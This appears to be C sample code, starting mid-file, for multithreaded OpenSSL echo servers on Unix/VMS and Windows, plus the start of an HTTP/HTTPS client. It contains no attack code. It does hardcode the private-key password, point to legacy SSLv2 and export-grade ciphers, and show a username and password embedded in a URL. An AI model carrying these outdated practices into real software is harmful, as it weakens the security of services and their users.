    pthread_attr_setdetachstate(&attr,PTHREAD_CREATE_JOINABLE);
    pthread_create(&arg->watchdog_thread,&attr,connection_watchdog,arg);
    /*
     * Endless loop waiting for activity on the socket.
     */
    for (;;){
#if defined (__VMS)
        FD_ZERO(&rmask);
        FD_SET(arg->s,&rmask);
        /*
         * A select is usually cancelable on most Unix by a pthread_cancel.
         * Look at the pthread man page to ensure it is actually cancelable.
         * On Unixes, the code can be much simplified, withdrawing the need for
         * the select, as behind the SSL_read ought to be either a recv or read
         * eventually with a select, which are all cancelable points on most
         * Unixes.
         *
         * On VMS, select/read/recv are not currently cancelable points. Hence,
         * for OpenVMS, the use of a select's timeout in order to execute the
         * portable pthread_testcancel() which will test a pending
         * pthread_cancel and will, via the pthread_cleanup_push/pop, execute
         * the finish routine which closes the SSL link.
         *
         * The bio_html Web browser emulator or an actual Web browser such as
         * Firefox or Internet Explorer partner program blocking on a SSL_read
         * will therefore be unblocked, the SSL_read returning zero, and
         * gracefully end.
         */
        switch (select(arg->s+1,&rmask,NULL,NULL,&timeout)){
        case 0:
            pthread_testcancel();
            continue;
        case -1:
            perror("select");
            pthread_exit(NULL);
            break;
        default:
#elif !defined (__unix__) && !defined (__unix)
#error "Unsupported operating system"
#endif
#if defined (USE_PTHREAD_KILL) && !defined (BAD_PRACTICE)
        /*
         * Unblock the sigwait with the SIGUSR2 signal to tell
         * we have activity.
         */
        pthread_kill(arg->watchdog_thread,SIGUSR2);
#else
        /*
         * Signal the watchdog thread we have socket activity.
         */
        pthread_mutex_lock(&arg->mutex);
        arg->signalled=1;
        pthread_cond_signal(&arg->cond);
        pthread_mutex_unlock(&arg->mutex);
#endif
        /*
         * Read the available data on the SSL link.
         * Allocate the buffer here with a calloc, just like
         * in any real SSL application. We will receive len
         * characters and we later copy them after the HTML prefix.
         * The received data is not necessarily zero terminated, so
         * read at most MAX_MESSAGE_SIZE-1 bytes and let the calloc
         * supply the terminating NUL the strstr below relies on.
         * This message buffer is freed just before the for loop
         * end.
         */
        arg->message=(char *)calloc(MAX_MESSAGE_SIZE,sizeof(char));
#if defined (BAD_PRACTICE)
        /*
         * Change this thread signal mask so we can be killed
         * with the SIGUSR1 signal if the SSL_read is hanging.
         */
        pthread_sigmask(SIG_UNBLOCK,&set,NULL);
#endif
        /*
         * On Linux, the SSL_read man page says:
         * The underlying BIO is blocking, SSL_read will return
         * once the read operation has been finished or an error
         * occurred, except when a renegotiation takes place, in
         * which case a SSL_ERROR_WANT_READ may occur.
         */
        len=SSL_read(arg->ssl,arg->message,MAX_MESSAGE_SIZE-1);
#if defined (BAD_PRACTICE)
        /*
         * Block the SIGUSR1 signal again.
         */
        pthread_sigmask(SIG_BLOCK,&set,NULL);
#endif
#if !defined (BAD_PRACTICE)
        /*
         * We come here either because the SSL_read has been
         * canceled, either after a completed alarm(2) or
         * after a cond_timedwait returning a timeout.
         *
         * The testcancel is compulsory on HP-UX and Tru64, but
         * not on Linux FC5. The fprintf (write) is a cancellation
         * point. On HP-UX and Tru64 this leaves the ScreenMutex
         * locked.
         */
#if !defined (__linux__) && !defined (HPUX_READ_EINTR_PATCH)
        pthread_testcancel();
#endif
#endif
        if (len <=0){
            pthread_mutex_lock(&ScreenMutex);
            fprintf(stdout,"Client disconnected\n");
            pthread_mutex_unlock(&ScreenMutex);
            /*
             * Abort the pthread_cond_timedwait or the sigwait
             * waiting watchdog thread.
             */
#if defined (USE_PTHREAD_KILL)
            pthread_kill(arg->watchdog_thread,SIGUSR1);
#else
            pthread_cancel(arg->watchdog_thread);
#endif
            pthread_exit(NULL);
        }
        pthread_mutex_lock(&ScreenMutex);
        fprintf(stdout,"Received %.*s\n",len,arg->message);
        pthread_mutex_unlock(&ScreenMutex);
        /*
         * Echo via the SSL link the data just received.
         */
        {
            char *msg;
            int sent_html=0;
            size_t prefix_len=0;
            int written;
            if (strstr(arg->message,"GET / HTTP"))
                arg->http_request=1;
            /*
             * The HTML prefix is only prepended for HTTP clients; the
             * buffer is sized under exactly the same condition as the copy,
             * otherwise the prefix would overrun a buffer sized for the
             * payload alone.
             */
            if ((arg->http_request) && !(sent_html))
                prefix_len=strlen(HTML_PREFIX);
            msg=(char *)calloc(prefix_len+len+1,sizeof(char));
            if (prefix_len){
                memcpy(msg,HTML_PREFIX,prefix_len);
                sent_html++;
            }
            /* copy by length: the payload may contain anything, NULs included */
            memcpy(msg+prefix_len,arg->message,len);
            written=SSL_write(arg->ssl,msg,(int)(prefix_len+len));
            free(msg);
            if (written<=0){
                /*
                 * The remote partner exited.
                 * Exit the thread meanwhile invoking the
                 * finish routine.
                 */
                pthread_mutex_lock(&ScreenMutex);
                fprintf(stdout,"Client disconnected\n");
                pthread_mutex_unlock(&ScreenMutex);
                /*
                 * Abort the pthread_cond_timedwait or the sigwait
                 * waiting watchdog thread.
                 */
#if defined (USE_PTHREAD_KILL)
                pthread_kill(arg->watchdog_thread,SIGUSR1);
#else
                pthread_cancel(arg->watchdog_thread);
#endif
                pthread_exit(NULL);
            }
        }
        free(arg->message);
        arg->message=NULL;
#if defined (__VMS)
        }/* end switch */
#endif
    }/* end for */
    pthread_cleanup_pop(1);
    return(NULL);
}

/*
 * Parse a dotted quad "a.b.c.d" into a host-order packed value.
 * Returns -1 if the string is not exactly four numbers separated by
 * dots with nothing trailing, or if any number is above 255.
 */
long get_ia(char *str)
{
    unsigned long ia;
    unsigned long temp[4];
    char ch;
    /* the trailing %c must NOT match: any extra character makes sscanf return 5 */
    if (sscanf (str, "%lu.%lu.%lu.%lu%c",
                &temp[0],&temp[1],&temp[2],&temp[3],&ch) != 4)
        return (-1);
    if ((temp[0] > 255) || (temp[1] > 255) || (temp[2] > 255) || (temp[3] > 255))
        return(-1);
    ia = temp[0] + (temp[1] << 8) + (temp[2] << 16) + (temp[3] << 24);
    return (ia);
}

/*
 * The routine setup_sockets enables to create sockets, bind and listen on them
 * on a variable number of computer's network interfaces, specified on the
 * command line. The last parameter in the command line is an optional port.
 * If no argument is specified then it creates one socket bound to
 * 0.0.0.0:default_port. For a program, it enables specifying the following
 * syntax: $ ./<prog> [IP of Interface1 .. [IP of InterfaceN]] [port]
 * All arguments between square brackets are optional.
 */
int setup_sockets(int argc, char **argv, int *s, unsigned short default_port)
{
    struct sockaddr_in s_name;      /* Address struct for socket2. */
    int on = 1,i;
    argc--;
    argv++;
    if (argc == 0){
        i=argc;
        memset(&s_name,0,sizeof(s_name));
        s_name.sin_port = htons(default_port) ;
        s_name.sin_addr.s_addr = htonl(INADDR_ANY);
        s_name.sin_family = AF_INET ;
        if ((s[i] = socket (AF_INET, SOCK_STREAM, 0)) == -1){
            perror("socket error") ;
            exit(EXIT_FAILURE);
        }
        if (setsockopt(s[i], SOL_SOCKET, SO_REUSEADDR, &on, sizeof (on)) < 0){
            perror("setsockopt error") ;
            exit(EXIT_FAILURE);
        }
        if (bind (s[i],(struct sockaddr *)&s_name, sizeof (s_name))<0){
            perror("bind error") ;
            exit(EXIT_FAILURE);
        }
        if (listen (s[i], 5) < 0){
            perror("listen error") ;
            exit(EXIT_FAILURE);
        }
    }
    else{
        for (i=0;i<argc;i++){
            memset(&s_name,0,sizeof(s_name));
            s_name.sin_family = AF_INET ;
            /* a last argument that is not an IP address is the port */
            if ((argc >= 1) && ((get_ia(argv[argc-1]) == -1)))
                s_name.sin_port = htons(atoi(argv[argc-1])) ;
            else
                s_name.sin_port = htons(default_port) ;
            if ((argc == 1) && ((get_ia(argv[argc-1]) == -1)))
                s_name.sin_addr.s_addr = htonl(INADDR_ANY);
            else if ((s_name.sin_addr.s_addr =get_ia(argv[i])) == -1)
                break;
            if ((s[i] = socket (AF_INET, SOCK_STREAM, 0)) == -1){
                perror("socket error") ;
                exit(EXIT_FAILURE);
            }
            if (setsockopt(s[i], SOL_SOCKET, SO_REUSEADDR, &on, sizeof (on)) < 0){
                perror("setsockopt error") ;
                exit(EXIT_FAILURE);
            }
            if (bind (s[i],(struct sockaddr *)&s_name, sizeof (s_name))<0){
                perror("bind error") ;
                exit(EXIT_FAILURE);
            }
            if (listen (s[i], 5) < 0){
                perror("listen error") ;
                exit(EXIT_FAILURE);
            }
        }/* end for */
    }/* end else */
    argc=i;
    if (argc == 0)
        argc++;
    return argc;
}

int main(int argc,char **argv)
{
    int s[10];                      /* sockets */
    int i;
    struct sockaddr_in s_name;      /* Address
struct for socket2.*/
    socklen_t namelength;
    fd_set rd_msk;
    arg_t *arg;
    SSL_CTX *ctx;
    pthread_attr_t attr;
#if defined (__unix__) || defined (__unix)
    sigset_t set;
#endif
    /*
     * For Unix systems we use a pthread_kill instead of a pthread_cancel.
     * So set the signal mask and use pthread_sigmask to block or unblock the
     * SIGUSR1 signal. If good practice, then block SIGALRM as well.
     */
#if defined (BAD_PRACTICE)
    struct sigaction action;
    warning();
#endif
    fprintf(stderr," beginning of the program\n ");
    argc=setup_sockets(argc,argv,s,AUXSERVER_PORT);
    pthread_mutex_init(&ScreenMutex,NULL);
    SSL_load_error_strings();
    /* Initialize the SSL library. */
    SSL_library_init();
    OpenSSL_add_all_ciphers();
    /*
     * Create an SSL context that will be used to communicate over SSLv2, SSLv3,
     * or TLSv1 protocol, depending on the choice made by the remote partner
     * program.
     */
    if ((ctx=SSL_CTX_new(SSLv23_server_method()))==NULL)
        berr_exit("Can't initialize SSLv23 context");
    if (!SSL_CTX_use_certificate_chain_file(ctx,KEYFILE))
        berr_exit("Can't read certificate");
    SSL_CTX_set_default_passwd_cb(ctx,password_cb);
    if (!SSL_CTX_use_PrivateKey_file(ctx, KEYFILE, SSL_FILETYPE_PEM))
        berr_exit("Can't read key file");
    if (!SSL_CTX_load_verify_locations(ctx,CA_LIST,0))
        berr_exit("Can't read CA list");
#if defined (__unix__) || defined (__unix)
    sigemptyset(&set);
    sigaddset(&set,SIGPIPE);
#if defined (USE_PTHREAD_KILL)
    sigaddset(&set,SIGUSR1);
#if !defined (BAD_PRACTICE)
    sigaddset(&set,SIGUSR2);
    sigaddset(&set,SIGALRM);
#endif
#endif
    /* the mask set here is inherited by every thread created below */
    pthread_sigmask(SIG_SETMASK,&set,NULL);
    pthread_sigmask(SIG_BLOCK,&set,NULL);
#endif
#if defined (BAD_PRACTICE)
    /*
     * On Unix, a signal handler is shared by all threads.
     * This handler is established for both the serve_connection
     * thread and the watchdog thread. We do not use the signal
     * statement as on Linux it has an undefined behavior in
     * multi-threaded applications.
     */
    action.sa_handler=SIGUSR1_handler;
    action.sa_flags=SA_RESTART;
    sigemptyset(&action.sa_mask);
    sigaction(SIGUSR1,&action,NULL);
#endif
    pthread_attr_init(&attr);
#if 0
    /* The call below is unnecessary in this case as the default stack size
     * seems to be sufficient on all tested operating systems. It is there
     * to highlight how one can set a thread stacksize before it gets created.
     * The stacksize parameter for the CreateThread on Windows must be
     * specified.
     */
    pthread_attr_setstacksize(&attr,10*PTHREAD_STACK_MIN);
#endif
    pthread_attr_setdetachstate(&attr,PTHREAD_CREATE_DETACHED);
    for (;;){
        namelength = sizeof (s_name);
        arg = (arg_t *)malloc(sizeof (arg_t));
        memset(arg,0,sizeof(arg_t));
        FD_ZERO(&rd_msk);
        for (i=0;i<argc;i++)
            FD_SET(s[i],&rd_msk);
        select(getdtablesize(),&rd_msk,NULL,NULL,NULL);
        for (i=0;i<argc;i++){
            if (FD_ISSET(s[i],&rd_msk))
                arg->s = accept (s[i],(struct sockaddr *)&s_name,&namelength) ;
        }
        if (arg->s == -1){
            pthread_mutex_lock(&ScreenMutex);
            perror ("accept error") ;
            pthread_mutex_unlock(&ScreenMutex);
            free(arg);
            exit(EXIT_FAILURE);
        }
        pthread_mutex_lock(&ScreenMutex);
        fprintf (stderr,"Client address : %s\n",inet_ntoa(s_name.sin_addr));
        fprintf (stderr,"Client port : %d\n",ntohs(s_name.sin_port) ) ;
        pthread_mutex_unlock(&ScreenMutex);
        /*
         * Create a new SSL object based upon what we chose on the CTX context
         * which will handle the SSL link with the remote peer.
         */
        arg->ssl=SSL_new(ctx);
        /*
         * Start the thread that will serve the connection.
         */
        pthread_create(&arg->connection_thread, &attr, serve_connection, arg);
    }
    return 1;
} /* end main */

********
* sslserver_windows.c
*******

#ifdef WIN32
#include <io.h>
#include <winsock2.h>
#include <process.h>
#else
#include <netdb.h>
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <errno.h>
#include <openssl/ssl.h>
#include <openssl/err.h>
#ifdef __VMS
#include <unixio.h>
#elif !defined (WIN32)
#include <unistd.h>
#endif

#define AUXSERVER_PORT 60000
#define MAX_MESSAGE_SIZE 50000
#define KEYFILE "server.pem"
#define PASSWORD "password"
#define CA_LIST "root.pem"
#define MAX_OUTSTANDING_CONNECTIONS 5

#define HTML_PREFIX "HTTP/1.1 200 OK\n" \
    "Content-Type:text/html\n\n" \
    "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\n" \
    "<HTML>\n" \
    "<HEAD>\n" \
    "<TITLE>sslserver echo</TITLE>\n" \
    "<META HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html; charset=iso-8859-1\">\n" \
    "</HEAD>\n" \
    "<BODY>\n" \
    "<PRE>\n"

#define HTML_SUFFIX "</PRE>\n" \
    "</BODY>\n" \
    "</HTML>\n"

#if defined (__VMS)
#define socklen_t unsigned int
#endif
#if defined (WIN32)
#define socklen_t int
#define close closesocket
#endif

static char *pass;

/* Password callback for the PEM private key; refuses if the buffer is too small. */
static int password_cb(char *buf,int num,int rwflag, void *userdata)
{
    if (num<(int)strlen(pass)+1)
        return 0;
    strcpy(buf,pass);
    return(strlen(pass));
}

typedef struct {
    SOCKET s;
    SSL *ssl;
    BIO *sbio;
    unsigned ThreadId;   /* id of the serve_connection thread (message queue target) */
    HANDLE cond;
} arg_t;

// Small error handling routine, that prints out the error, plus OpenSSL
// relevant information upon why the call failed.
void berr_exit(char *str){
    fprintf(stderr,"%s\n",str);
    ERR_print_errors_fp(stderr);
    exit(EXIT_FAILURE);
}

void cleanup(arg_t *arg)
{
    int retval;
    /*
     * Write the html suffix and close the connection.
     */
    retval=SSL_write(arg->ssl,HTML_SUFFIX,strlen(HTML_SUFFIX));
    BIO_free_all(arg->sbio);
    retval = close (arg->s);
    if (retval)
        perror ("close");
} /* end cleanup*/

void finish(void *ptr){
    arg_t *arg =(arg_t *)ptr;
    cleanup (arg) ;
    CloseHandle(arg->cond);
    free(arg);
}

char *WSAStrError (int WSAError){
    /*
     * All Windows Sockets error constants are biased by WSABASEERR from
     * the "normal".
     */
    struct WSAerrno {
        char *text;
        int value;
    };
    static struct WSAerrno ErrorTable [] ={
        {"WSABASEERR", WSABASEERR},
        /*
         * Windows Sockets definitions of regular Microsoft C error constants
         */
        {"WSAEINTR", (WSABASEERR+4)},
        {"WSAEBADF", (WSABASEERR+9)},
        {"WSAEACCES", (WSABASEERR+13)},
        {"WSAEFAULT", (WSABASEERR+14)},
        {"WSAEINVAL", (WSABASEERR+22)},
        {"WSAEMFILE", (WSABASEERR+24)},
        /*
         * Windows Sockets definitions of regular Berkeley error constants
         */
        {"WSAEWOULDBLOCK", (WSABASEERR+35)},
        {"WSAEINPROGRESS", (WSABASEERR+36)},
        {"WSAEALREADY", (WSABASEERR+37)},
        {"WSAENOTSOCK", (WSABASEERR+38)},
        {"WSAEDESTADDRREQ", (WSABASEERR+39)},
        {"WSAEMSGSIZE", (WSABASEERR+40)},
        {"WSAEPROTOTYPE", (WSABASEERR+41)},
        {"WSAENOPROTOOPT", (WSABASEERR+42)},
        {"WSAEPROTONOSUPPORT", (WSABASEERR+43)},
        {"WSAESOCKTNOSUPPORT", (WSABASEERR+44)},
        {"WSAEOPNOTSUPP", (WSABASEERR+45)},
        {"WSAEPFNOSUPPORT", (WSABASEERR+46)},
        {"WSAEAFNOSUPPORT", (WSABASEERR+47)},
        {"WSAEADDRINUSE", (WSABASEERR+48)},
        {"WSAEADDRNOTAVAIL", (WSABASEERR+49)},
        {"WSAENETDOWN", (WSABASEERR+50)},
        {"WSAENETUNREACH", (WSABASEERR+51)},
        {"WSAENETRESET", (WSABASEERR+52)},
        {"WSAECONNABORTED", (WSABASEERR+53)},
        {"WSAECONNRESET", (WSABASEERR+54)},
        {"WSAENOBUFS", (WSABASEERR+55)},
        {"WSAEISCONN", (WSABASEERR+56)},
        {"WSAENOTCONN", (WSABASEERR+57)},
        {"WSAESHUTDOWN", (WSABASEERR+58)},
        {"WSAETOOMANYREFS", (WSABASEERR+59)},
        {"WSAETIMEDOUT", (WSABASEERR+60)},
        {"WSAECONNREFUSED", (WSABASEERR+61)},
        {"WSAELOOP", (WSABASEERR+62)},
        {"WSAENAMETOOLONG",
        (WSABASEERR+63)},
        {"WSAEHOSTDOWN", (WSABASEERR+64)},
        {"WSAEHOSTUNREACH", (WSABASEERR+65)},
        {"WSAENOTEMPTY", (WSABASEERR+66)},
        {"WSAEPROCLIM", (WSABASEERR+67)},
        {"WSAEUSERS", (WSABASEERR+68)},
        {"WSAEDQUOT", (WSABASEERR+69)},
        {"WSAESTALE", (WSABASEERR+70)},
        {"WSAEREMOTE", (WSABASEERR+71)},
        {"WSAEDISCON", (WSABASEERR+101)},
        /*
         * Extended Windows Sockets error constant definitions
         */
        {"WSASYSNOTREADY", (WSABASEERR+91)},
        {"WSAVERNOTSUPPORTED", (WSABASEERR+92)},
        {"WSANOTINITIALISED", (WSABASEERR+93)},
        /*
         * Error return codes from gethostbyname() and gethostbyaddr()
         * (when using the resolver). Note that these errors are
         * retrieved via WSAGetLastError() and must therefore follow
         * the rules for avoiding clashes with error numbers from
         * specific implementations or language run-time systems.
         * For this reason the codes are based at WSABASEERR+1001.
         * Note also that [WSA]NO_ADDRESS is defined only for
         * compatibility purposes.
         */
        /* Authoritative Answer: Host not found */
        {"WSAHOST_NOT_FOUND", (WSABASEERR+1001)},
        /* Non-Authoritative: Host not found, or SERVERFAIL */
        {"WSATRY_AGAIN", (WSABASEERR+1002)}
    };
    int i;
    static char buffer[100];
    for (i=0;i<sizeof (ErrorTable)/sizeof (struct WSAerrno);i++)
        if (ErrorTable[i].value == WSAError)
            return (ErrorTable[i].text);
    /* not in the table: report the raw number */
    snprintf (buffer,sizeof(buffer),"WSAUNKNOWNERR %d",WSAError);
    return (buffer);
}

/*
 * Thread entry points handed to _beginthreadex must be
 * unsigned __stdcall f(void *).
 */
unsigned __stdcall connection_watchdog(void *ptr){
#define SLEEP_TIME 1000 // 1 second
    arg_t *arg=(arg_t *)ptr;
    DWORD ret;
    for (;;){
        ret = WaitForSingleObject(arg->cond,SLEEP_TIME);
        if (ret == WAIT_TIMEOUT){
            /*
             * Time elapsed without any SSL activity. Post a WM_USER+1 message to the
             * target serve_connection thread's message queue and exit this thread.
             */
            PostThreadMessage(arg->ThreadId,WM_USER+1,0,0);
            _endthreadex(0);
        }
        /* the semaphore handle was closed by finish(): the connection is gone */
        if (ret != WAIT_OBJECT_0)
            _endthreadex(0);
    }
}

unsigned __stdcall serve_connection (void *ptr){
    arg_t *arg=(arg_t *)ptr;
    int len;
    int sent_html=0;
    char *message=NULL;
    HANDLE hThread;
    unsigned hThreadId;
    MSG msg;
    fd_set rmask;
    struct timeval timeout={0,10000};
    char *current_cipher_name;
    /*
     * Initialize a message queue for this thread.
     */
    PeekMessage(&msg,NULL,WM_USER,WM_USER,PM_NOREMOVE);
    /*
     * Complete the SSL connection from the remote peer.
     */
    arg->sbio=BIO_new_socket((int)arg->s,BIO_NOCLOSE);
    if (arg->sbio == NULL){
        printf("sbio NULL\n");
        exit(EXIT_FAILURE);
    }
    SSL_set_bio(arg->ssl,arg->sbio,arg->sbio);
    /*
     * Choose the encryption algorithm by selecting a cipher.
     * As bio_html is a SSL V2 client, one must choose a sslv2 cipher.
     * To get available ciphers to choose for this application, enter the
     * command:
     *     openssl ciphers -v -sslv2
     * The EXP1024-DHE-DSS-RC4-SHA cipher is a sslv3 cipher and cannot be used
     * here with a sslv2 client.
     */
    // if (SSL_set_cipher_list(arg->ssl,"EXP1024-DHE-DSS-RC4-SHA") <= 0)
    //     berr_exit("cipher could not be set");
    /*
     * This server will send its X509 certificate to the client when the
     * connection is accepted, but using SSL_VERIFY_NONE, this program does
     * not require a certificate from the remote SSL peer.
     */
    SSL_set_verify(arg->ssl,SSL_VERIFY_NONE,NULL);
    /*
     * Do accept the SSL connection.
     */
    if ((len=SSL_accept(arg->ssl))<=0){
        fprintf(stderr,"SSL accept error\n");
        ERR_print_errors_fp(stderr);
        goto out;
    }
    current_cipher_name=(char *)SSL_get_cipher_name(arg->ssl);
    printf("Using cipher %s\n",current_cipher_name);
    /*
     * Create an unnamed counting semaphore with initial value
     * of 0 (blocking).
     */
    arg->cond = CreateSemaphore (NULL,   // Semaphore attributes
                                 0,      // initial count
                                 1,      // maximum count
                                 NULL);  // Semaphore name
    /*
     * Start the connection activity watchdog.
     */
    hThread = (HANDLE)_beginthreadex(NULL,                // Thread Attributes.
                                     1000,                // Initial Stack size.
                                     connection_watchdog, // Thread entry point
                                     arg,                 // Thread parameter
                                     0,                   // Thread is to start immediately
                                     &hThreadId);
    if(hThread == 0){
        fprintf (stdout, "Error creating socket's link Thread handler\n");
        goto out;
    }
    /*
     * Loop waiting for activity on the socket.
     */
    for (;;){
        FD_ZERO(&rmask);
        FD_SET(arg->s,&rmask);
        /*
         * Use a timeout on the select in order to be able to PeekMessage.
         */
        switch (select(arg->s+1,&rmask,NULL,NULL,&timeout)){
        case 0:
            /*
             * If we have a WM_USER+1 message on our thread message queue,
             * exit this thread.
             */
            if (PeekMessage(&msg,(HWND)(-1),WM_USER+1,WM_USER+1,PM_REMOVE))
                goto out;
            else
                continue;
        case -1:
            fprintf (stdout,"Select Error (%s)",WSAStrError(WSAGetLastError()));
            goto out;
            break ;
        default:
            /*
             * Signal the connection watchdog we have socket activity.
             */
            ReleaseSemaphore (arg->cond,1,NULL);
            /*
             * Read the available data on the SSL link. Leave one byte so the
             * calloc'd NUL survives even a full read: the printf below treats
             * the buffer as a string.
             */
            message=(char *)calloc(MAX_MESSAGE_SIZE,sizeof(char));
            len=SSL_read(arg->ssl,message,MAX_MESSAGE_SIZE-1);
            if (len <=0){
                fprintf(stdout,"Client disconnected\n");
                free(message);
                goto out;
            }
            fprintf(stdout,"Received %.*s\n",len,message);
            /*
             * Echo via the SSL link the data just received.
             */
            {
                char *msg;
                size_t off=0;
                int written;
                if (!sent_html)
                    off=strlen(HTML_PREFIX);
                msg=(char *)calloc(off+len+1,sizeof(char));
                if (!sent_html){
                    memcpy(msg,HTML_PREFIX,off);
                    sent_html++;
                }
                /* copy by length; the payload is not necessarily text */
                memcpy(msg+off,message,len);
                /* SSL_write returns an int: a size_t can never be negative */
                written=SSL_write(arg->ssl,msg,(int)(off+len));
                free(msg);
                if (written==0)
                    /*
                     * The remote partner exited.
                     * Exit the thread meanwhile invoking the
                     * finish routine.
                     */
                    goto out;
                if (written<0)
                    berr_exit("Error writing to SSL socket");
            }
            free(message);
        }/* end switch */
    }/* end for */
out:;
    finish(arg);
    _endthreadex(0);
    return 0;
}

int main (int argc, char **argv)
{
    SOCKET s,lsock;
    int address_len;
    arg_t *arg;
    struct sockaddr_in this,from;
    WORD wVersionRequested;
    WSADATA wsaData;
    HANDLE hThread;
    SSL_CTX *ctx;
    wVersionRequested = MAKEWORD(2,0);
    if(WSAStartup(wVersionRequested,&wsaData)!=0){
        fprintf (stderr,"WSAStartup failed\n");
        return (EXIT_FAILURE);
    }
    if ((LOBYTE(wsaData.wVersion) != 2) || (HIBYTE(wsaData.wVersion) != 0)) {
        fprintf (stderr,"WSAStartup bad version %d,%d\n",
                 LOBYTE(wsaData.wVersion), HIBYTE(wsaData.wVersion));
        WSACleanup();
        return (EXIT_FAILURE);
    }
    fprintf(stdout," beginning of the program\n ");
    SSL_load_error_strings();
    // Initialize the SSL library.
    SSL_library_init();
    OpenSSL_add_all_ciphers();
    /*
     * Create a TCPIP (stream) socket.
     */
    if ((lsock = socket ( PF_INET,SOCK_STREAM,0)) == INVALID_SOCKET) {
        fprintf (stderr,"socket lsock error = %d\n",WSAGetLastError());
        WSACleanup();
        return (EXIT_FAILURE);
    }
    /*
     * Now bind lsock to a TCPIP port number.
     */
    memset (&this, 0, sizeof (this));
    this.sin_family = PF_INET ;
    this.sin_port = htons(AUXSERVER_PORT);
    this.sin_addr.s_addr = htonl(INADDR_ANY);
    if ( bind (lsock,(struct sockaddr *)&this,sizeof (this))== SOCKET_ERROR) {
        fprintf (stderr,"bind lsock error = %s\n",WSAStrError(WSAGetLastError()));
        WSACleanup();
        return (EXIT_FAILURE);
    }
    /* Wait for connection requests (listen) and redirect the connection to a
     * dynamic socket s (accept).
     */
    if (listen (lsock, MAX_OUTSTANDING_CONNECTIONS)== SOCKET_ERROR) {
        fprintf (stderr,"listen error = %s\n",WSAStrError(WSAGetLastError()));
        WSACleanup();
        return (EXIT_FAILURE);
    }
    /*
     * Create an SSL context that will be used to communicate over SSLv2, or SSLv3
     * or TLSv1 protocol depending on the choice of the remote partner program.
     */
    if ((ctx=SSL_CTX_new(SSLv23_server_method()))==NULL)
        berr_exit("Can't initialize SSLv23 context");
    if (!SSL_CTX_use_certificate_chain_file(ctx,KEYFILE))
        berr_exit("Can't read certificate");
    pass=PASSWORD;
    SSL_CTX_set_default_passwd_cb(ctx,password_cb);
    if (!SSL_CTX_use_PrivateKey_file(ctx, KEYFILE, SSL_FILETYPE_PEM))
        berr_exit("Can't read key file");
    if (!SSL_CTX_load_verify_locations(ctx,CA_LIST,0))
        berr_exit("Can't read CA list");
    for (;;){
        address_len = sizeof(from);
        if((s = accept (lsock, (struct sockaddr *)&from,&address_len)) == INVALID_SOCKET){
            fprintf (stderr,"accept error %s",WSAStrError(WSAGetLastError()));
            WSACleanup();
            return (EXIT_FAILURE);
        }
        fprintf (stdout,"Client address : %s\n",inet_ntoa(from.sin_addr)) ;
        fprintf (stderr,"Client port : %d\n",ntohs(from.sin_port) ) ;
        /*
         * Now we can create a thread that will serve the connection on socket s.
         */
        // Create the dynamic thread; zero the block so finish() never closes
        // an uninitialised semaphore handle if SSL_accept fails early.
        arg = calloc(1,sizeof(arg_t));
        arg->s = s;
        arg->ssl=SSL_new(ctx);
        hThread = (HANDLE)_beginthreadex(NULL,             // Thread Attributes.
                                         1000000,          // Initial Stack size.
                                         serve_connection, // Thread entry point
                                         arg,              // Thread parameter.
                                         0,                // Thread is to start immediately
                                         &arg->ThreadId);
        if(hThread == 0){
            fprintf (stderr, "Error creating socket's link Thread handler\n");
            WSACleanup();
            return (EXIT_FAILURE);
        }
        /* the thread is never joined, so drop our handle to it right away */
        CloseHandle(hThread);
    } /* end for(;;) */
    return (EXIT_SUCCESS);
}

*******
* bio_html.c
*******

#ifdef WIN32
#include <winsock2.h>
#else
#include <netdb.h>
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <errno.h>
#include <openssl/ssl.h>
#include <openssl/err.h>
#include <openssl/x509v3.h>
#ifdef __VMS
#include <unixio.h>
#else
#include <unistd.h>
#endif
#if defined (_XOPEN_SOURCE_EXTENDED) && defined (__hpux)
#include <sys/byteorder.h>
#endif

// Define possible WEB ports.
#define HTTP_PROXY_PORT 8080
#define HTTP_PORT 80
#define HTTPS_PORT 443
#ifndef WIN32
#define SOCKET int
#define SOCKET_ERROR -1
#endif

// Setup constants.
char const *http = "http://";
char const *https = "https://";
char const *CRLF = "\015\012";

extern char *encode_64(const char *str, const char *eol);

//
// This routine parses the command line to determine the remote host and port
// where to connect to, according to most Web browsers' rules. It recognizes if
// the http command contains an authentication string (Username/password).
// which_len is the capacity of the which buffer: the path is copied with a
// bound, since it comes straight from the command line.
char *parse(char *command,char **filters, short number_filters,
            char *which, size_t which_len, unsigned short *port, char **userpasswd){
    char const slash = '/';
    char const star = '*';
    char *cp,*cp1,*cp2;
    static char *host;
    int j;
    cp = strstr(command,http);
    cp2 = strstr(command,https);
    if ((cp != command) && (cp2 != command)){
        fprintf(stderr,"Bad http:// command : %s\n",command);
        exit(0);
    }
    if (cp)
        cp += strlen(http);
    if (cp2)
        cp = cp2 + strlen(https);
    if ((cp1 = strchr(cp,'@')) == NULL){
        *userpasswd = NULL;
        // host located, return string after the first single slash.
        host = cp;
    }
    else{
        *cp1++ = '\0';
        host = cp1;
        *userpasswd = cp;
        cp = cp1;
    }
    cp = strchr(host,slash);
    if (cp == NULL)
        snprintf(which,which_len,"/");
    else {
        snprintf(which,which_len,"%s",cp);
        *cp = '\0';
    }
    // Now determine the port we will use.
    // The rule is that if found in the set of filters,
    // we use port 80, otherwise port=8080.
    // The star character in an address filter must be in
    // first position.
    if (number_filters >= 0)
        *port = HTTP_PROXY_PORT; // Assume not found in the filters.
    else{
        if (strstr(command,https))
            *port=HTTPS_PORT;
        else
            *port = HTTP_PORT;
    }
    for (j=0; j< number_filters;j++){
        if (strstr(host,filters[j] + sizeof(star)) != NULL){
            if (strstr(command,https))
                *port=HTTPS_PORT;
            else
                *port=HTTP_PORT;
            break;
        }
    }
    return host;
}

void usage(char *str){
    fprintf(stderr,"Syntax : %s <http command> [<proxy server name>]",str);
    fprintf(stderr,"[<filter1> .. <filterN>]\n");
    fprintf(stderr,"Examples : ");
    fprintf(stderr,"%s http://www.compaq.com/\n",str);
    fprintf(stderr,"With authentication string : %s http://vouters:vouters@sos6.evt.cpqcorp.net/\n",str);
    fprintf(stderr,"With alternate HTTP port (default 80) : %s http://sos6.evt.cpqcorp.net:82/\n",str);
    fprintf(stderr,"With alternate HTTP_PROXY port (default 8080) : %s http://www.compaq.fr/ proxy:8086\n",str);
    exit(0);
}

// Small error handling routine, that prints out the error, plus OpenSSL
